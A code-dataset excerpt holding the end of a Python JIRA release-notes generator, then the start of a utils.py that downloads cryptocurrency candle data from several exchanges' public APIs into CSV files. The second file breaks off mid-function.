return JiraIter.retry_load(err, params, fail_count)
return data
@staticmethod
def retry_load(err, params, fail_count):
"""Retry connection up to NUM_RETRIES times."""
print(err)
fail_count += 1
if fail_count <= NUM_RETRIES:
print "Connection failed %d times. Retrying." % (fail_count)
sleep(1)
return JiraIter.load_jira(params, fail_count)
else:
print "Connection failed %d times. Aborting." % (fail_count)
sys.exit(1)
@staticmethod
def collect_jiras(ver, projects):
"""send queries to JIRA and collect all issues
that belongs to given version and projects"""
jiras = []
pos = 0
end = 1
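# Page through the JIRA search results: each response reports 'startAt',
# 'maxResults', and 'total', so 'pos' advances one page at a time until it
# has walked past 'total'.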
while pos < end:
data = JiraIter.query_jira(ver, projects, pos)
if 'error_messages' in data:
print "JIRA returns error message: %s" % data['error_messages']
sys.exit(1)
pos = data['startAt'] + data['maxResults']
end = data['total']
jiras.extend(data['issues'])
if ver not in RELEASE_VERSION:
for issue in data['issues']:
for fix_version in issue['fields']['fixVersions']:
if 'releaseDate' in fix_version:
RELEASE_VERSION[fix_version['name']] = fix_version[
'releaseDate']
return jiras
def __init__(self, version, projects):
self.version = version
self.projects = projects
self.field_id_map = JiraIter.collect_fields()
ver = str(version).replace("-SNAPSHOT", "")
self.jiras = JiraIter.collect_jiras(ver, projects)
self.iter = self.jiras.__iter__()
def __iter__(self):
return self
def next(self):
data = self.iter.next()
j = Jira(data, self)
return j
class Linter(object):
"""Encapsulates lint-related functionality.
Maintains running lint statistics about JIRAs."""
_valid_filters = ["incompatible", "important", "version", "component",
"assignee"]
def __init__(self, version, options):
self._warning_count = 0
self._error_count = 0
self._lint_message = ""
self._version = version
self._filters = dict(zip(self._valid_filters, [False] * len(
self._valid_filters)))
self.enabled = False
self._parse_options(options)
@staticmethod
def add_parser_options(parser):
"""Add Linter options to passed optparse parser."""
filter_string = ", ".join("'" + f + "'" for f in Linter._valid_filters)
parser.add_option(
"-n",
"--lint",
dest="lint",
action="append",
type="string",
help="Specify lint filters. Valid filters are " + filter_string +
". " + "'all' enables all lint filters. " +
"Multiple filters can be specified comma-delimited and " +
"filters can be negated, e.g. 'all,-component'.")
def _parse_options(self, options):
"""Parse options from optparse."""
if options.lint is None or len(options.lint) == 0:
return
self.enabled = True
# Valid filter specifications are
# self._valid_filters, negations, and "all"
# copy so the class-level list of valid filters is not mutated in place
valid_list = list(self._valid_filters)
valid_list += ["-" + v for v in valid_list]
valid_list += ["all"]
valid = set(valid_list)
enabled = []
disabled = []
for o in options.lint:
for token in o.split(","):
if token not in valid:
print "Unknown lint filter '%s', valid options are: %s" % \
(token, ", ".join(v for v in sorted(valid)))
sys.exit(1)
if token.startswith("-"):
disabled.append(token[1:])
else:
enabled.append(token)
for e in enabled:
if e == "all":
for f in self._valid_filters:
self._filters[f] = True
else:
self._filters[e] = True
for d in disabled:
self._filters[d] = False
def had_errors(self):
"""Returns True if a lint error was encountered, else False."""
return self._error_count > 0
def message(self):
"""Return summary lint message suitable for printing to stdout."""
if not self.enabled:
return
return self._lint_message + \
"\n=======================================" + \
"\n%s: Error:%d, Warning:%d \n" % \
(self._version, self._error_count, self._warning_count)
def _check_missing_component(self, jira):
"""Return if JIRA has a 'missing component' lint error."""
if not self._filters["component"]:
return False
if len(jira.fields['components']) > 0:
return False
return True
def _check_missing_assignee(self, jira):
"""Return if JIRA has a 'missing assignee' lint error."""
if not self._filters["assignee"]:
return False
if jira.fields['assignee'] is not None:
return False
return True
def _check_version_string(self, jira):
"""Return if JIRA has a version string lint error."""
if not self._filters["version"]:
return False
field = jira.parent.field_id_map['Fix Version/s']
for ver in jira.fields[field]:
found = re.match(r'^((\d+)(\.\d+)*).*$|^(\w+\-\d+)$', ver['name'])
if not found:
return True
return False
def lint(self, jira):
"""Run lint check on a JIRA."""
if not self.enabled:
return
if len(jira.get_release_note()) == 0:
if self._filters["incompatible"] and jira.get_incompatible_change():
self._warning_count += 1
self._lint_message += "\nWARNING: incompatible change %s lacks release notes." % \
(sanitize_text(jira.get_id()))
if self._filters["important"] and jira.get_important():
self._warning_count += 1
self._lint_message += "\nWARNING: important issue %s lacks release notes." % \
(sanitize_text(jira.get_id()))
if self._check_version_string(jira):
self._warning_count += 1
self._lint_message += "\nWARNING: Version string problem for %s " % jira.get_id()
if self._check_missing_component(jira) or self._check_missing_assignee(
jira):
self._error_count += 1
error_message = []
if self._check_missing_component(jira):
error_message.append("component")
if self._check_missing_assignee(jira):
error_message.append("assignee")
self._lint_message += "\nERROR: missing %s for %s " \
% (" and ".join(error_message), jira.get_id())
def parse_args():
"""Parse command-line arguments with optparse."""
usage = "usage: %prog [OPTIONS] " + \
"--project PROJECT [--project PROJECT] " + \
"--version VERSION [--version VERSION2 ...]"
parser = OptionParser(
usage=usage,
epilog=
"Markdown-formatted CHANGES and RELEASENOTES files will be stored"
" in a directory named after the highest version provided.")
parser.add_option("-i",
"--index",
dest="index",
action="store_true",
default=False,
help="build an index file")
parser.add_option("-l",
"--license",
dest="license",
action="store_true",
default=False,
help="Add an ASF license")
parser.add_option("-p",
"--project",
dest="projects",
action="append",
type="string",
help="projects in JIRA to include in releasenotes",
metavar="PROJECT")
parser.add_option("-r",
"--range",
dest="range",
action="store_true",
default=False,
help="Given versions are a range")
parser.add_option(
"--sortorder",
dest="sortorder",
metavar="TYPE",
default=SORTORDER,
# dec is supported for backward compatibility
choices=["asc", "dec", "desc", "newer", "older"],
help="Sorting order for sort type (default: %s)" % SORTORDER)
parser.add_option("--sorttype",
dest="sorttype",
metavar="TYPE",
default=SORTTYPE,
choices=["resolutiondate", "issueid"],
help="Sorting type for issues (default: %s)" % SORTTYPE)
parser.add_option(
"-t",
"--projecttitle",
dest="title",
type="string",
help="Title to use for the project (default is Apache PROJECT)")
parser.add_option("-u",
"--usetoday",
dest="usetoday",
action="store_true",
default=False,
help="use current date for unreleased versions")
parser.add_option("-v",
"--version",
dest="versions",
action="append",
type="string",
help="versions in JIRA to include in releasenotes",
metavar="VERSION")
parser.add_option(
"-V",
dest="release_version",
action="store_true",
default=False,
help="display version information for releasedocmaker and exit.")
parser.add_option("-O",
"--outputdir",
dest="output_directory",
action="append",
type="string",
help="specify output directory to put release docs to.")
parser.add_option("-B",
"--baseurl",
dest="base_url",
action="append",
type="string",
help="specify base URL of the JIRA instance.")
parser.add_option(
"--retries",
dest="retries",
action="append",
type="int",
help="Specify how many times to retry connection for each URL.")
parser.add_option("-X",
"--incompatiblelabel",
dest="incompatible_label",
default="backward-incompatible",
type="string",
help="Specify the label to indicate backward incompatibility.")
Linter.add_parser_options(parser)
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)
(options, _) = parser.parse_args()
# Validate options
if not options.release_version:
if options.versions is None:
parser.error("At least one version needs to be supplied")
if options.projects is None:
parser.error("At least one project needs to be supplied")
if options.base_url is not None:
if len(options.base_url) > 1:
parser.error("Only one base URL should be given")
else:
options.base_url = options.base_url[0]
if options.output_directory is not None:
if len(options.output_directory) > 1:
parser.error("Only one output directory should be given")
else:
options.output_directory = options.output_directory[0]
return options
def main():
options = parse_args()
if options.release_version:
with open(
os.path.join(
os.path.dirname(__file__), "../VERSION"), 'r') as ver_file:
print ver_file.read()
sys.exit(0)
if options.output_directory is not None:
# Create the output directory if it does not exist.
# Equivalent to `mkdir -p`.
try:
os.makedirs(options.output_directory)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(
options.output_directory):
pass
else:
print "Unable to create output directory %s: %s" % \
(options.output_directory, exc.message)
sys.exit(1)
os.chdir(options.output_directory)
if options.base_url is not None:
global JIRA_BASE_URL
JIRA_BASE_URL = options.base_url
if options.incompatible_label is not None:
global BACKWARD_INCOMPATIBLE_LABEL
BACKWARD_INCOMPATIBLE_LABEL = options.incompatible_label
proxy = urllib2.ProxyHandler()
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
projects = options.projects
if options.range is True:
versions = [Version(v)
for v in GetVersions(options.versions, projects).getlist()]
else:
versions = [Version(v) for v in options.versions]
versions.sort()
global SORTTYPE
SORTTYPE = options.sorttype
global SORTORDER
SORTORDER = options.sortorder
if options.title is None:
title = projects[0]
else:
title = options.title
if options.retries is not None:
global NUM_RETRIES
NUM_RETRIES = options.retries[0]
haderrors = False
for version in versions:
vstr = str(version)
linter = Linter(vstr, options)
jlist = sorted(JiraIter(vstr, projects))
if len(jlist) == 0:
print "There is no issue which has the specified version: %s" % version
continue
if vstr in RELEASE_VERSION:
reldate = RELEASE_VERSION[vstr]
elif options.usetoday:
reldate = strftime("%Y-%m-%d", gmtime())
else:
reldate = "Unreleased (as of %s)" % strftime("%Y-%m-%d", gmtime())
if not os.path.exists(vstr):
os.mkdir(vstr)
reloutputs = Outputs("%(ver)s/RELEASENOTES.%(ver)s.md",
"%(ver)s/RELEASENOTES.%(key)s.%(ver)s.md", [],
{"ver": version,
"date": reldate,
"title": title})
choutputs = Outputs("%(ver)s/CHANGES.%(ver)s.md",
"%(ver)s/CHANGES.%(key)s.%(ver)s.md", [],
{"ver": version,
"date": reldate,
"title": title})
if options.license is True:
reloutputs.write_all(ASF_LICENSE)
choutputs.write_all(ASF_LICENSE)
relhead = '# %(title)s %(key)s %(ver)s Release Notes\n\n' \
'These release notes cover new developer and user-facing ' \
'incompatibilities, important issues, features, and major improvements.\n\n'
chhead = '# %(title)s Changelog\n\n' \
'## Release %(ver)s - %(date)s\n'\
'\n'
reloutputs.write_all(relhead)
choutputs.write_all(chhead)
incompatlist = []
importantlist = []
buglist = []
improvementlist = []
newfeaturelist = []
subtasklist = []
tasklist = []
testlist = []
otherlist = []
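# Bucket each issue by type for the changelog sections; incompatible and
# "important" issues are pulled out first so they are not double-counted below.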
for jira in jlist:
if jira.get_incompatible_change():
incompatlist.append(jira)
elif jira.get_important():
importantlist.append(jira)
elif jira.get_type() == "Bug":
buglist.append(jira)
elif jira.get_type() == "Improvement":
improvementlist.append(jira)
elif jira.get_type() == "New Feature":
newfeaturelist.append(jira)
elif jira.get_type() == "Sub-task":
subtasklist.append(jira)
elif jira.get_type() == "Task":
tasklist.append(jira)
elif jira.get_type() == "Test":
testlist.append(jira)
else:
otherlist.append(jira)
line = '* [%s](' % (sanitize_text(jira.get_id())) + JIRA_BASE_URL + \
'/browse/%s) | *%s* | **%s**\n' \
% (sanitize_text(jira.get_id()),
sanitize_text(jira.get_priority()), sanitize_text(jira.get_summary()))
if len(jira.get_release_note()) > 0 or \
jira.get_incompatible_change() or jira.get_important():
reloutputs.write_key_raw(jira.get_project(), "\n---\n\n")
reloutputs.write_key_raw(jira.get_project(), line)
if len(jira.get_release_note()) == 0:
line = '\n**WARNING: No release note provided for this change.**\n\n'
else:
line = '\n%s\n\n' % (
processrelnote(jira.get_release_note()))
reloutputs.write_key_raw(jira.get_project(), line)
linter.lint(jira)
if linter.enabled:
print linter.message()
if linter.had_errors():
haderrors = True
shutil.rmtree(vstr)
continue
reloutputs.write_all("\n\n")
reloutputs.close()
if incompatlist:
choutputs.write_all("### INCOMPATIBLE CHANGES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(incompatlist)
if importantlist:
choutputs.write_all("\n\n### IMPORTANT ISSUES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(importantlist)
if newfeaturelist:
choutputs.write_all("\n\n### NEW FEATURES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(newfeaturelist)
if improvementlist:
choutputs.write_all("\n\n### IMPROVEMENTS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(improvementlist)
if buglist:
choutputs.write_all("\n\n### BUG FIXES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(buglist)
if testlist:
choutputs.write_all("\n\n### TESTS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(testlist)
if subtasklist:
choutputs.write_all("\n\n### SUB-TASKS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(subtasklist)
if tasklist or otherlist:
choutputs.write_all("\n\n### OTHER:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(otherlist)
choutputs.write_list(tasklist)
choutputs.write_all("\n\n")
choutputs.close()
if options.index:
buildindex(title, options.license)
buildreadme(title, options.license)
if haderrors is True:
sys.exit(1)
if __name__ == "__main__":
main()
``` |
{
"source": "JiazhengChai/cryptoData",
"score": 3
} |
#### File: JiazhengChai/cryptoData/utils.py
```python
import os
import csv
import json
import time
import pytz
import requests
import dateparser
import datetime as dt
from binance.client import Client
from datetime import datetime, timedelta
cur_path=os.path.abspath(os.getcwd())
data_folder = os.path.join(cur_path, "data")
if not os.path.exists(data_folder):
os.makedirs(data_folder)
int_to_month_dict = {
1: "Jan", 2: "Feb", 3: "March", 4: "Apr", 5: "May", 6: "June", 7: "July", 8: "Aug", 9: "Sep", 10: "Oct", 11: "Nov",
12: "Dec"
}
bybit_root_url = 'https://api.bybit.com/'
bitbank_root_url = 'https://public.bitbank.cc'
bitstamp_root_url = 'https://www.bitstamp.net/api/v2/ohlc'
binance_spot_url = 'https://api.binance.com/api/v3/klines'
binance_delivery_url='https://dapi.binance.com/dapi/v1/klines'
bitfinex_root_url = 'https://api-pub.bitfinex.com/v2/candles/trade:'
poloniex_root_url = "https://poloniex.com/public?command=returnChartData&"
def date_to_milliseconds(date_str):
"""Convert UTC date to milliseconds
:param date_str: date in readable format, i.e. "January 01, 2018", "11 hours ago UTC", "now UTC"
:type date_str: str
"""
# get epoch value in UTC
epoch = datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
# parse our date string
d = dateparser.parse(date_str)
# if the date is not timezone aware apply UTC timezone
if d.tzinfo is None or d.tzinfo.utcoffset(d) is None:
d = d.replace(tzinfo=pytz.utc)
# return the difference in time
return int((d - epoch).total_seconds() * 1000.0)
def date_to_utc(date_str):
"""Convert date to UTC
:param date_str: date in readable format, i.e. "January 01, 2018", "11 hours ago UTC", "now UTC"
:type date_str: str
"""
# get epoch value in UTC
epoch = datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
# parse our date string
d = dateparser.parse(date_str)
# if the date is not timezone aware apply UTC timezone
if d.tzinfo is None or d.tzinfo.utcoffset(d) is None:
d = d.replace(tzinfo=pytz.utc)
# return the difference in time
# int() on a timedelta raises TypeError; return whole seconds since the UTC epoch instead
return int((d - epoch).total_seconds())
def interval_to_milliseconds(interval):
"""Convert a interval string to milliseconds
:param interval: interval string 1m, 3m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d, 3d, 1w
:type interval: str
:return:
None if unit not one of m, h, d or w
None if string not in correct format
int value of interval in milliseconds
"""
ms = None
seconds_per_unit = {
"m": 60,
"h": 60 * 60,
"d": 24 * 60 * 60,
"w": 7 * 24 * 60 * 60
}
unit = interval[-1]
if unit in seconds_per_unit:
try:
ms = int(interval[:-1]) * seconds_per_unit[unit] * 1000
except ValueError:
pass
return ms
def binance_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base=base.upper()
quote=quote.upper()
if quote=="USD":
quote=quote+"T"
symbol=base+quote
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
client = Client("", "")
limit = 500
timeframe = interval_to_milliseconds(interval)
start_ts = date_to_milliseconds(start_str)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
idx = 0
symbol_existed = False
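# Fetch klines one page ('limit' candles) at a time, advancing start_ts just
# past the last returned candle; a short page means the end of the data, and a
# short sleep every 3 requests keeps the query rate modest.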
while True:
temp_data = client.get_klines(
symbol=symbol,
interval=interval,
limit=limit,
startTime=start_ts,
endTime=end_ts
)
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(temp_data[i][0] / 1000.0)
op = temp_data[i][1]
hi = temp_data[i][2]
lo = temp_data[i][3]
cl = temp_data[i][4]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
start_ts = temp_data[len(temp_data) - 1][0] + timeframe
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def binance_delivery_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base=base.upper()
quote=quote.upper()
symbol=base+"USD_PERP"
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
client = Client("", "")
limit = 500
timeframe = interval_to_milliseconds(interval)
start_ts = date_to_milliseconds(start_str)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
idx = 0
symbol_existed = False
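# Paging logic for the coin-margined (dapi) klines endpoint. Two caveats:
# client._request is an internal python-binance helper (assumed available; its
# signature may differ between library versions), and an explicit end_str is
# effectively required because end_ts is compared directly below.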
while True:
temp_data=client._request('get', 'https://dapi.binance.com/dapi/v1/klines', False, True,
params={
'symbol':symbol,
'interval':interval,
'limit':limit,
'startTime':start_ts,
'endTime':start_ts+(limit-1)*timeframe
})
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(temp_data[i][0] / 1000.0)
op = temp_data[i][1]
hi = temp_data[i][2]
lo = temp_data[i][3]
cl = temp_data[i][4]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
start_ts = start_ts + (limit) * timeframe
if(end_ts <= start_ts):
break
if(end_ts < start_ts+(limit)*timeframe):
limit=1+(end_ts-start_ts)//timeframe
else:
print("Symbol not yet available for the requested dates.")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def bitstamp_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
# bitstamp
available_pairs=["btcusd", "btceur", "btcgbp", "btcpax", "gbpusd",
"gbpeur", "eurusd", "xrpusd", "xrpeur", "xrpbtc",
"xrpgbp", "xrppax", "ltcusd", "ltceur", "ltcbtc",
"ltcgbp", "ethusd", "etheur", "ethbtc", "ethgbp",
"ethpax", "bchusd", "bcheur", "bchbtc", "bchgbp", "paxusd",
"paxeur", "paxgbp", "xlmbtc", "xlmusd", "xlmeur", "xlmgbp"]
base=base.lower()
quote=quote.lower()
symbol=base+quote
if symbol not in available_pairs:
print("Requested symbol not available in Bitstamp.")
print("Please select from: ")
print(available_pairs)
quit()
def bitstamp_get_bars(symbol, interval=86400, start=None, end=None, limit=500):
url = bitstamp_root_url + '/' + symbol + '?step=' + str(interval) + '&limit=' + str(limit)
if start:
url = url + '&start=' + str(start)
if end:
url = url + '&end=' + str(end)
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 500
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)-timeframe
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
else:
end_ts=start_ts+500*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >500:
cur_end=cur_start+500*timeframe
idx = 0
symbol_existed = False
while True:
temp_data=bitstamp_get_bars(symbol, interval = timeframe,start=cur_start ,end=cur_end,limit=int((cur_end-cur_start)/timeframe) )
temp_data=temp_data["data"]["ohlc"]
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["timestamp"]))
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["timestamp"]) + timeframe
cur_end=cur_start+500*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def poloniex_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
try:
assert interval in ["5m","15m","30m","2h","4h","1d"]
except:
print("For poloniex, only the following timeframes are available.")
print(["5m","15m","30m","2h","4h","1d"])
quit()
base=base.upper()
quote=quote.upper()
if quote=="USD":
quote=quote+"T"
symbol=quote+"_"+base
def poloniex_get_bars(symbol, interval=5, start=None, end=None):
url = poloniex_root_url + "currencyPair=" + symbol + '&start=' + str(start) + '&end=' + str(
end) + "&period=" + str(interval) + "&resolution=auto"
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 10000
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
prev_time=0
while True:
temp_data=poloniex_get_bars(symbol, interval = timeframe,start=cur_start ,end=cur_end)
#print(len(temp_data))
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["date"]))
if i==0 :
print(date)
if prev_time!=0 :
if int(temp_data[i]["date"] - prev_time) != timeframe:
print("TIME GAP DETECTED between consecutive candles.")
if i==len(temp_data)-1:
print(date)
prev_time=int(temp_data[i]["date"])
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["date"]) + timeframe
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if idx % 3 == 0:
time.sleep(1)
def bitfinex_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
try:
assert interval in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1d', '7d', '14d']
except:
print("For poloniex, only the following timeframes are available.")
print(['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1d', '7d', '14d'])
quit()
base = base.upper()
quote = quote.upper()
if quote == "USDT":
quote = "USD"
symbol = base + quote
def bitfinex_get_bars(symbol, tf, start=None, end=None, limit=10000):
tf_min=tf // 60000
time_symbol="m"
if tf_min >= 1440:
tf_min=tf_min//1440
time_symbol = "D"
elif tf_min>=60:
tf_min=tf_min//60
time_symbol = "h"
url = bitfinex_root_url + str(tf_min) + time_symbol+":t" + symbol + "/hist?" + '&start=' + str(
start) + '&end=' + str(end) + \
"&limit=" + str(limit) + "&sort=1"
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 10000
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts =int(end_ts)
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
start=time.time()
prev_time=0
while True:
temp_data=bitfinex_get_bars(symbol, tf = timeframe,start=cur_start ,end=cur_end,limit=limit)
#print(len(temp_data))
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i][0]/1000))
if i == 0:
print(date)
if prev_time != 0:
if int(temp_data[i][0] - prev_time) != timeframe:
print("TIME GAP DETECTED between consecutive candles.")
if i == len(temp_data) - 1:
print(date)
prev_time = int(temp_data[i][0])
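# Bitfinex v2 candles are assumed to be [MTS, OPEN, CLOSE, HIGH, LOW, VOLUME],
# hence the index mapping below (open=1, close=2, high=3, low=4, volume=5).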
op = temp_data[i][1]
hi = temp_data[i][3]
lo = temp_data[i][4]
cl = temp_data[i][2]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
try:
cur_start = int(temp_data[len(temp_data) - 1][0]) + timeframe
except Exception:
print("Empty or malformed response from Bitfinex; keeping the previous start timestamp.")
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if idx % 3 == 0:
time.sleep(1)
def bybit_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base = base.upper()
quote = quote.upper()
symbol = base + quote
try:
if quote=="USD":
assert base in ["BTC","ETH","XRP","EOS"]
elif quote=="USDT":
assert base in ["BTC","ETH","LTC","BCH","LINK","XTZ"]
except:
print(symbol+" does not exist in Bybit.")
print("Try changing the quote currency to 'USD' or 'USDT'")
quit()
def bybit_get_bars(symbol, interval=5, start=None, limit=200):
if "USDT" in symbol:
url = bybit_root_url + "public/linear/kline?symbol=" + symbol + "&interval=" + str(
interval) + "&limit=" + str(limit) + "&from=" + str(start)
else:
url = bybit_root_url + "v2/public/kline/list?symbol=" + symbol + "&interval=" + str(
interval) + "&limit=" + str(limit) + "&from=" + str(start)
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 200
if "m" in interval:
interval_num=int(interval.replace("m",""))
elif "h" in interval:
hour=int(interval.replace("h",""))
interval_num=hour*60
else:
interval_num = interval[-1].upper()
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
if interval!="5m":
end_ts=end_ts+timeframe
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
while True:
temp_data=bybit_get_bars(symbol, interval = interval_num,start=cur_start,limit=int((cur_end-cur_start)/timeframe))
temp_data=temp_data["result"]
if not temp_data:
print("Cannot query data for the current input parameters.")
exit()
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["open_time"]))
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
if (cur_end >= end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["open_time"]) + timeframe
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts+timeframe
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def bitbank_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base = base.lower()
quote = quote.lower()
if quote in ["usd","usdt"]:
symbol = base + "_jpy"
else:
symbol = base + quote
if "min" not in interval and "m" in interval:
interval=interval+"in"
def bitbank_get_bars(symbol, ymd, interval="5min"):
url = bitbank_root_url + "/" + symbol + "/candlestick/" + interval + "/" + ymd
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
if "min" not in interval:
print("Only minutes interval supported now.")
print("Exiting.")
exit()
interval_unit=int(interval.replace("min",""))
idx = 0
def daterange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
try:
sd = datetime.strptime(start_str, '%B %d, %Y')
ed = datetime.strptime(end_str, '%B %d, %Y')
except:
sd = datetime.strptime(start_str, '%b %d, %Y')
ed = datetime.strptime(end_str, '%b %d, %Y')
for single_date in daterange(sd, ed):
ymd=single_date.strftime("%Y%m%d")
temp_data=bitbank_get_bars(symbol, ymd=ymd,interval =interval)
data=temp_data["data"]["candlestick"][0]["ohlcv"]
#print(len(data))
start_h=9
start_m=0
today_date=single_date
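# bitbank returns one day of candles per request; start_h = 9 rebuilds local
# timestamps on the assumption that the day's first candle is 00:00 UTC,
# i.e. 09:00 JST on the machine running this script.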
for i in range(len(data)):
if(start_m==0):
date = today_date.strftime('%Y-%m-%d') + " " + str(start_h) + ":00:00"
else:
date = today_date.strftime('%Y-%m-%d') + " " + str(start_h) + ":" + str(start_m)+ ":00"
if i==0:
print(date)
op = data[i][0]
hi = data[i][1]
lo = data[i][2]
